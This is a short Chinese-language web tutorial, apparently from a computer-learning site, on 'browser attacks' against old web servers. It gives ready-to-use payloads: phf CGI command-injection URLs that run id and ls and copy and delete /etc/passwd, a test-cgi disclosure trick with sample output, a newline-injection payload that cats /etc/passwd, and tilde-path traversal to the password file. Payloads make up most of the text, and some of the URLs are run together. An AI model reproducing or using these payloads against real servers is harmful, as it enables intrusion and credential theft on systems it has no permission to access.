萬盛學電腦網

 萬盛學電腦網 >> 健康知識 >> 浏覽器攻擊

浏覽器攻擊

  在本章我將講述一些利用浏覽器來進行攻擊的方法1。大家都知道了phf攻擊了,phf是cgi script,很多站點都有這個大漏洞啦,使用?Qalias=x /bin/cat /etc/passwd指令可以拿到那個站點的passwd.但還有些更好的執行方法呦如:? id&Qalias=&Qname=haqr&Qemail=&Qnickna

me=&Qoffice_phone=http://thegnome.com/cgi-bin/phf? ls -la ~someuser&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=http://thegnome.com/cgi-bin/phf? cp /etc/passwd ~someuser/passwd &Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=http://thegnome.com/~someuser/passwd? rm ~someuser/passwd&Qalias=&Qname

=haqr&Qemail=&Qnickname=&Qoffice_phone=上面執行的命令是idls -la ~someusercp /etc/passwd ~someuser/passwdrm ~someuser/passwd

2。有關test攻擊?\whatever服務器會應答,本服務器的一些情況如:CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4BSERVER_NAME = thegnome.comGATEWAY_INTERFACE = CGI/1.1SERVER_PROTOCOL = HTTP/1.0SERVER_PORT = 80REQUEST_METHOD = GETHTTP_ACCEPT = text/plain, application/x-html, application/html,text/html, text/x-htmlPATH_INFO =PATH_TRANSLATED =SCRIPT_NAME = /cgi-bin/test-cgiQUERY_STRING = whateverREMOTE_HOST = fifth.column.govREMOTE_ADDR = 200.200.200.200REMOTE_USER =AUTH_TYPE =CONTENT_TYPE =CONTENT_LENGTH =

好吧,讓我們來點趕興趣的?\help&0a/bin/cat /etc/passwd

3。~的應用~主要是用在很多的個人主頁上的快捷目錄的方法,如果我們使用這樣的~~root~root/etc/passwd不是在任何平台上都通過呦,在BSD Apache上曾經成功過,當然還可以試試~bin ,~etc,~uucp.....看到這個站點了嗎,,本站所在的這個站點就是用這種形式的,如果我們打入 本站所在的web地址/~bin出現了什麼,你看到了嗎?然後...............注意請不要破壞

copyright © 萬盛學電腦網 all rights reserved